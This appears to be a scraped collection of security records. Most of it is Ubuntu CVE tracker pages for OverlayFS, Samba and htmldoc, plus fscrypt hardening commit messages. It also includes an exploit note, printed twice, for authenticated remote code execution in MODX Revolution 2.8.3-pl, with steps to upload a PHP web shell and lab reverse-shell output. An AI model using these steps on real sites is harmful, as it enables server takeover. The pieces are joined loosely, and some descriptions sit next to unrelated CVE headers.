A flaw was found in the Linux kernel's OverlayFS subsystem in the way the user mounts the TmpFS filesystem with OverlayFS. This flaw allows a local user to gain access to hidden files that should not be accessible.

CVE-2021-3732: CVE-2021-3732 | Ubuntu

A security issue was found in Linux kernel’s OverlayFS subsystem where a local attacker who has the ability to mount the TmpFS filesystem with OverlayFS can abuse a logic bug in the overlayfs code which can inadvertently reveal files hidden in the original mount.

linux  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-159.167)  
focal Released (5.4.0-89.100)  
hirsute Released (5.11.0-38.42)  
impish Not vulnerable (5.13.0-16.16)  
trusty Ignored (was needed ESM criteria)  
upstream Released (5.14~rc6)  
xenial Ignored (was needed ESM criteria)  
linux-aws  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-1112.119)  
focal Released (5.4.0-1058.61)  
hirsute Released (5.11.0-1020.21)  
impish Not vulnerable (5.13.0-1005.6)  
trusty Ignored (was needed ESM criteria)  
upstream Released (5.14~rc6)  
xenial Ignored (was needed ESM criteria)  
linux-aws-5.0  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-aws-5.3)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-aws-5.11  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.11.0-1020.21~20.04.2)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-aws-5.13  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Not vulnerable (5.13.0-1008.9~20.04.2)  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-aws-5.3  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-aws-5.4)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-aws-5.4  
Launchpad, Ubuntu, Debian bionic Released (5.4.0-1058.61~18.04.3)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-aws-5.8  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Ignored (was needs-triage now end-of-life)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-aws-hwe  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Released (4.15.0-1112.119~16.04.1)  
linux-azure  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-azure-5.3)  
focal Released (5.4.0-1062.65)  
hirsute Released (5.11.0-1020.21)  
impish Not vulnerable (5.13.0-1004.5)  
trusty Released (4.15.0-1124.137~14.04.1)  
upstream Released (5.14~rc6)  
xenial Released (4.15.0-1124.137~16.04.1)  
linux-azure-4.15  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-1124.137)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-azure-5.11  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.11.0-1020.21~20.04.1)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-azure-5.3  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-azure-5.4)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-azure-5.4  
Launchpad, Ubuntu, Debian bionic Released (5.4.0-1062.65~18.04.1)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-azure-5.8  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Ignored (was needed now end-of-life)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-azure-edge  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-azure-5.3)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-azure-fde  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Not vulnerable (5.4.0-1063.66+cvm2.2)  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-bluefield  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.4.0-1020.23)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-dell300x  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-1028.33)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-fips  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gcp  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-gcp-5.3)  
focal Released (5.4.0-1056.60)  
hirsute Released (5.11.0-1021.23)  
impish Not vulnerable (5.13.0-1003.4)  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Released (4.15.0-1109.123~16.04.1)  
linux-gcp-4.15  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-1109.123)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gcp-5.11  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.11.0-1021.23~20.04.1)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gcp-5.13  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Not vulnerable (5.13.0-1008.9~20.04.3)  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gcp-5.3  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-gcp-5.4)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gcp-5.4  
Launchpad, Ubuntu, Debian bionic Released (5.4.0-1056.60~18.04.1)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gcp-5.8  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Ignored (was needs-triage now end-of-life)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gcp-edge  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-gcp-5.3)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gke  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.4.0-1054.57)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Ignored (reached end of standard support)  
linux-gke-4.15  
Launchpad, Ubuntu, Debian bionic Ignored (was needs-triage now end-of-life)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gke-5.0  
Launchpad, Ubuntu, Debian bionic Ignored (was needs-triage now end-of-life)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gke-5.3  
Launchpad, Ubuntu, Debian bionic Ignored (was needs-triage now end-of-life)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gke-5.4  
Launchpad, Ubuntu, Debian bionic Released (5.4.0-1054.57~18.04.1)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gkeop  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.4.0-1025.26)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-gkeop-5.4  
Launchpad, Ubuntu, Debian bionic Released (5.4.0-1025.26~18.04.1)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-hwe  
Launchpad, Ubuntu, Debian bionic Ignored (replaced by linux-hwe-5.4)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Released (4.15.0-159.167~16.04.1)  
linux-hwe-5.11  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.11.0-38.42~20.04.1)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-hwe-5.13  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Not vulnerable (5.13.0-21.21~20.04.1)  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-hwe-5.4  
Launchpad, Ubuntu, Debian bionic Released (5.4.0-89.100~18.04.1)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-hwe-5.8  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Ignored (was needed now end-of-life)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-hwe-edge  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-hwe-5.4)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Ignored (superseded by linux-hwe)  
linux-ibm  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.4.0-1006.7)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-ibm-5.4  
Launchpad, Ubuntu, Debian bionic Not vulnerable (5.4.0-1010.11~18.04.2)  
focal Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-intel-5.13  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Not vulnerable  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-kvm  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-1100.102)  
focal Released (5.4.0-1048.50)  
hirsute Released (5.11.0-1018.19)  
impish Not vulnerable (5.13.0-1002.2)  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Ignored (was needed ESM criteria)  
linux-lts-xenial  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Ignored (was needed ESM criteria)  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oem  
Launchpad, Ubuntu, Debian bionic Ignored (was needs-triage now end-of-life)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Ignored (superseded by linux-hwe)  
linux-oem-5.10  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.10.0-1050.52)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oem-5.13  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.13.0-1014.18)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oem-5.14  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Not vulnerable (5.14.0-1004.4)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oem-5.6  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Ignored (was needs-triage now end-of-life)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oem-osp1  
Launchpad, Ubuntu, Debian bionic Ignored (was needs-triage now end-of-life)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oracle  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-1081.89)  
focal Released (5.4.0-1056.60)  
hirsute Released (5.11.0-1020.21)  
impish Not vulnerable (5.13.0-1008.10)  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Released (4.15.0-1081.89~16.04.1)  
linux-oracle-5.0  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-oracle-5.3)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oracle-5.11  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.11.0-1020.21~20.04.1)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oracle-5.13  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Not vulnerable (5.13.0-1011.13~20.04.2)  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oracle-5.3  
Launchpad, Ubuntu, Debian bionic Ignored (superseded by linux-oracle-5.4)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oracle-5.4  
Launchpad, Ubuntu, Debian bionic Released (5.4.0-1056.60~18.04.1)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-oracle-5.8  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Ignored (was needs-triage now end-of-life)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-raspi  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.4.0-1045.49)  
hirsute Released (5.11.0-1021.22)  
impish Not vulnerable (5.13.0-1007.8)  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-raspi-5.4  
Launchpad, Ubuntu, Debian bionic Released (5.4.0-1045.49~18.04.1)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-raspi2  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-1096.102)  
focal Ignored (replaced by linux-raspi)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Ignored (was needs-triage now end-of-life)  
linux-raspi2-5.3  
Launchpad, Ubuntu, Debian bionic Ignored (was needs-triage now end-of-life)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-riscv  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Ignored (superseded by linux-riscv-5.8)  
hirsute Released (5.11.0-1021.22)  
impish Not vulnerable (5.13.0-1003.3)  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-riscv-5.11  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Released (5.11.0-1021.22~20.04.1)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-riscv-5.8  
Launchpad, Ubuntu, Debian bionic Does not exist  
focal Ignored (was needs-triage now end-of-life)  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Does not exist  
linux-snapdragon  
Launchpad, Ubuntu, Debian bionic Released (4.15.0-1113.122)  
focal Does not exist  
hirsute Does not exist  
impish Does not exist  
trusty Does not exist  
upstream Released (5.14~rc6)  
xenial Ignored (was needs-triage now end-of-life)

A flaw was found in the way samba implemented DCE/RPC. If a client to a Samba server sent a very large DCE/RPC request, and chose to fragment it, an attacker could replace later fragments with their own data, bypassing the signature requirements.

Published: **9 November 2021**

A flaw was found in the way samba implemented DCE/RPC. If a client to a Samba server sent a very large DCE/RPC request, and chose to fragment it, an attacker could replace later fragments with their own data, bypassing the signature requirements.

**Notes**

Author

Note

mdeslaur

affects 4.10.0 and later

**Status**

Package

Release

Status

samba  
Launchpad, Ubuntu, Debian

bionic

Not vulnerable (2:4.7.6+dfsg~ubuntu-0ubuntu2.24)  

focal

Released (2:4.13.14+dfsg-0ubuntu0.20.04.1)  

hirsute

Released (2:4.13.14+dfsg-0ubuntu0.21.04.1)  

impish

Released (2:4.13.14+dfsg-0ubuntu0.21.10.1)  

jammy

Released (2:4.13.14+dfsg-0ubuntu1)  

trusty

Not vulnerable  

upstream

Released (4.13.14)  

xenial

Not vulnerable  

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23192
*   https://www.samba.org/samba/security/CVE-2021-23192.html
*   https://www.samba.org/samba/history/samba-4.13.14.html
*   https://ubuntu.com/security/notices/USN-5142-1
*   NVD
*   Launchpad
*   Debian

**Bugs**

*   https://bugzilla.samba.org/show\_bug.cgi?id=14875

CVE-2021-23192: CVE-2021-23192 | Ubuntu

A flaw was found in htmldoc in v1.9.12 and before. Null pointer dereference in file_extension(),in file.c may lead to execute arbitrary code and denial of service.

Published: **3 June 2021**

\[Unknown description\]

**Status**

Package

Release

Status

htmldoc  
Launchpad, Ubuntu, Debian

bionic

Not vulnerable  

focal

Released (1.9.7-1ubuntu0.2)  

groovy

Ignored (reached end-of-life)  

hirsute

Released (1.9.11-2ubuntu0.1)  

impish

Not vulnerable (1.9.11-4)  

trusty

Does not exist  

upstream

Released (1.9.11-4)  

xenial

Ignored (out of standard support)  

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23180
*   https://github.com/michaelrsweet/htmldoc/issues/418
*   https://github.com/michaelrsweet/htmldoc/commit/19c582fb32eac74b57e155cffbb529377a9e751a
*   https://ubuntu.com/security/notices/USN-5198-1
*   NVD
*   Launchpad
*   Debian

**Bugs**

*   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989437

CVE-2021-23180: CVE-2021-23180 | Ubuntu

A flaw was found in htmldoc in v1.9.12 and prior. A stack buffer overflow in parse_table() in ps-pdf.cxx may lead to execute arbitrary code and denial of service.

Published: **3 June 2021**

\[Unknown description\]

**Status**

Package

Release

Status

htmldoc  
Launchpad, Ubuntu, Debian

bionic

Needed  

focal

Needed  

groovy

Ignored (reached end-of-life)  

hirsute

Ignored (reached end-of-life)  

impish

Needed  

trusty

Does not exist  

upstream

Needs triage  

xenial

Ignored (out of standard support)  

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23206
*   https://github.com/michaelrsweet/htmldoc/issues/416
*   https://github.com/michaelrsweet/htmldoc/commit/ba61a3ece382389ae4482c7027af8b32e8ab4cc8
*   NVD
*   Launchpad
*   Debian

**Bugs**

*   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989437

CVE-2021-23206: CVE-2021-23206 | Ubuntu

A security issue was found in htmldoc v1.9.12 and before. A NULL pointer dereference in the function image_load_jpeg() in image.cxx may result in denial of service.

Published: **3 June 2021**

\[Unknown description\]

**Status**

Package

Release

Status

htmldoc  
Launchpad, Ubuntu, Debian

bionic

Needed  

focal

Needed  

groovy

Ignored (reached end-of-life)  

hirsute

Ignored (reached end-of-life)  

impish

Needed  

trusty

Does not exist  

upstream

Needs triage  

xenial

Ignored (out of standard support)  

**References**

*   https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-23191
*   https://github.com/michaelrsweet/htmldoc/issues/415
*   https://github.com/michaelrsweet/htmldoc/commit/369b2ea1fd0d0537ba707f20a2f047b6afd2fbdc
*   NVD
*   Launchpad
*   Debian

**Bugs**

*   http://bugs.debian.org/cgi-bin/bugreport.cgi?bug=989437

CVE-2021-23191: CVE-2021-23191 | Ubuntu

Published: **9 November 2021**

Subsequent DCE/RPC fragment injection vulnerability. If a client to a Samba server sent a very large DCE/RPC request, and chose to fragment it, an attacker could replace later fragments with their own data, bypassing the signature requirements.

**Status**

Package

Release

Status

samba  
Launchpad, Ubuntu, Debian

bionic

Not vulnerable (2:4.7.6+dfsg~ubuntu-0ubuntu2.24)  

focal

Released (2:4.13.14+dfsg-0ubuntu0.20.04.1)  

hirsute

Released (2:4.13.14+dfsg-0ubuntu0.21.04.1)  

impish

Released (2:4.13.14+dfsg-0ubuntu0.21.10.1)  

trusty

Not vulnerable  

upstream

Released (4.13.14)  

xenial

Not vulnerable

MODX Revolution through 2.8.3-pl allows remote authenticated administrators to execute arbitrary code by uploading an executable file, because the Uploadable File Types setting can be changed by an administrator.

\# Exploit Title: Authenticated Remote Code Execution in MODX Revolution V2.8.3-pl

\# Remote Code Execution in MODX Revolution V2.8.3-pl and earlier allows remote attackers to execute arbitrary code via uploading a php web shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 26th Feb'2022

\# CVE ID: CVE-2022-26149

\# Confirmed on release 2.8.3-pl

\# Vendor: https://modx.com/download

###############################################

#Step1- Login with Admin Credentials

#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:

Add the php file extension under the "Uploadable File Types" option available in "System Settings"

#Step3- Now Goto Media=>Media Browser and upload the Shell.php

#Step4- Now visit http://IP\_Address/Shell.php and get the reverse shell:

listening on \[any\] 4477 ...

connect to \[192.168.56.1\] from (UNKNOWN) \[192.168.56.130\] 58056

bash: cannot set terminal process group (1445): Inappropriate ioctl for device

bash: no job control in this shell

daemon@debian:/opt/bitnami/modx$

CVE-2022-26149: 0days/Exploit.txt at main · sartlabs/0days

\# Exploit Title: Authenticated Remote Code Execution in MODX Revolution V2.8.3-pl

\# Remote Code Execution in MODX Revolution V2.8.3-pl and earlier allows remote attackers to execute arbitrary code via uploading a php web shell.

\# Exploit Author: Sarang Tumne @CyberInsane (Twitter: @thecyberinsane) #HTB profile: https://www.hackthebox.com/home/users/profile/2718

\# Date: 26th Feb'2022

\# CVE ID:

\# Confirmed on release 2.8.3-pl

\# Vendor: https://modx.com/download

###############################################

#Step1- Login with Admin Credentials

#Step2- Uploading .php files is disabled by default hence we need to abuse the functionality:

Add the php file extension under the "Uploadable File Types" option available in "System Settings"

#Step3- Now Goto Media=>Media Browser and upload the Shell.php

#Step4- Now visit http://IP\_Address/Shell.php and get the reverse shell:

listening on \[any\] 4477 ...

connect to \[192.168.56.1\] from (UNKNOWN) \[192.168.56.130\] 58056

bash: cannot set terminal process group (1445): Inappropriate ioctl for device

bash: no job control in this shell

daemon@debian:/opt/bitnami/modx$

The bash_completion script for fscrypt allows injection of commands via crafted mountpoint paths, allowing privilege escalation under a specific set of circumstances. A local user who has control over mountpoint paths could potentially escalate their privileges if they create a malicious mountpoint path and if the system administrator happens to be using the fscrypt bash completion script to complete mountpoint paths.  We recommend upgrading to version 0.3.3 or above

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=88&v=4)

![josephlr](https://avatars.githubusercontent.com/u/5506060?s=60&v=4)

![dirkmueller](https://avatars.githubusercontent.com/u/1029152?s=60&v=4)

![mgerstner](https://avatars.githubusercontent.com/u/24227799?s=60&v=4)

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Following the example of /proc/self/mountinfo, replace the space,
newline, tab, and backslash characters with octal escape sequences so
that the output can be parsed unambiguously.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Mountpoint paths might be untrusted arbitrary strings; the fscrypt bash
completion script might need to complete to such strings.
Unfortunately, the design of bash completion places some major footguns
in the way of doing this correctly and securely:

   - "compgen -W" expands anything passed to it, so the argument to -W
     must be single-quoted to avoid an extra level of expansion.

   - The backslashes needed to escape meta-characters in the completed
     text aren't added automatically; they must be explicitly added.

Note that the completion script for 'umount' used to have these same
bugs (https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=892179,
util-linux/util-linux#539).

Fix these bugs in roughly the same way that 'umount' fixed them.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Don't allow reading metadata files that are very large, as they can
crash the program due to the memory required.  Similarly, don't allow
reading metadata files that aren't regular files, such as FIFOs, or
symlinks (which could point to a device node like /dev/zero), as that
can hang the program.  Both issues were particularly problematic for
pam\_fscrypt, as they could prevent users from being able to log in.

Note: these checks are arguably unneeded if we strictly check the file
ownership too, which a later commit will do.  But there's no reason not
to do these basic checks too.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

If a login protector contains a UID that differs from the file owner
(and the file owner is not root), it might be a spoofed file that was
created maliciously, so make sure to consider such files to be invalid.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

To allow users to update fscrypt metadata they own in
single-user-writable metadata directories (introduced by the next
commit), fall back to non-atomic overwrites when atomic ones can't be
done due to not having write access to the directory.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

World-writable directories are not appropriate for some systems, so
offer a choice of single-user-writable and world-writable modes, with
single-user-writable being the default.  Add a new documentation section
to help users decide which one to use.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

The metadata validation checks introduced by the previous commits are
good, but to reduce the attack surface it would be much better to avoid
reading and parsing files owned by other users in the first place.

There are some possible use cases for users sharing fscrypt metadata
files, but I think that for the vast majority of users it is unneeded
and just opens up attack surface.  Thus, make fscrypt (and pam\_fscrypt)
not process policies or protectors owned by other users by default.
Specifically,

   \* If fscrypt or pam\_fscrypt is running as a non-root user, only
     policies and protectors owned by the user or by root can be used.

   \* If fscrypt is running as root, any policy or protector can be used.
     (This is to match user expectations -- starting a sudo session
     should gain rights, not remove rights.)

   \* If pam\_fscrypt is running as root, only policies and protectors
     owned by root can be used.  Note that this only applies when the
     root user themselves has an fscrypt login protector, which is rare.

Add an option 'allow\_cross\_user\_metadata' to /etc/fscrypt.conf which
allows restoring the old behavior for anyone who really needs it.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

A previous commit extended file ownership validation to policy and
protector files (by default -- there's an opt-out in /etc/fscrypt.conf).

However, that didn't apply to the parent directories:

	MOUNTPOINT
	MOUNTPOINT/.fscrypt
	MOUNTPOINT/.fscrypt/policies
	MOUNTPOINT/.fscrypt/protectors

The problem is that if the parent directories aren't trusted (owned by
another non-root user), then untrusted changes to their contents can be
made at any time, including the introduction of symlinks and so on.

While it's debatable how much of a problem this really is, given the
other validations that are done, it seems to be appropriate to validate
the parent directories too.

Therefore, this commit applies the same ownership validations to the
above four directories as are done on the metadata files themselves.

In addition, it is validated that none of these directories are symlinks
except for ".fscrypt" where this is explicitly supported.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Since commit 4c7c663 ("Set owner of login protectors to correct
user"), login protectors are made owned by the user when root creates
one on a user's behalf.  That's good, but the same isn't true of other
files that get created at the same time:

- The policy protecting the directory
- The protector link file, if the policy is on a different filesystem
- The recovery protector, if the policy is on a different filesystem
- The recovery instructions file

In preparation for setting all metadata files to mode 0600, start making
all these files owned by the user in this scenario as well.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Since fscrypt replaces metadata files rather than overwrites them (to
get atomicity), their owner will change to root if root makes a change.
That isn't too much of an issue when the files have mode 0644.  However,
it will become a much bigger issue when the files have mode 0600,
especially because existing files with mode 0644 would also get changed
to have mode 0600.

In preparation for this, start preserving the previous owner and mode of
policy and protector files when they are updated.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

Currently, fscrypt policies and protectors are world readable, as they
are created with mode 0644.  While this can be nice for use cases where
users share these files, those use cases seem to be quite rare, and it's
not a great default security-wise since it exposes password hashes to
all users.  While fscrypt uses a very strong password hash algorithm, it
would still be best to follow the lead of /etc/shadow and keep this
information non-world-readable.

Therefore, start creating these files with mode 0600.

Of course, if users do actually want to share these files, they have the
option of simply chmod'ing them to a less restrictive mode.  An option
could also be added to make fscrypt use the old mode 0644; however, the
need for that is currently unclear.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

If the error is anything other than ErrNotSetup, it might be helpful to
know what is going on.

![@ebiggers](https://avatars.githubusercontent.com/u/2373140?s=40&v=4)

pam\_fscrypt should never need to do anything for system users, so detect
them early so that we can avoid wasting any resources looking for their
login protector.

Tag

#debian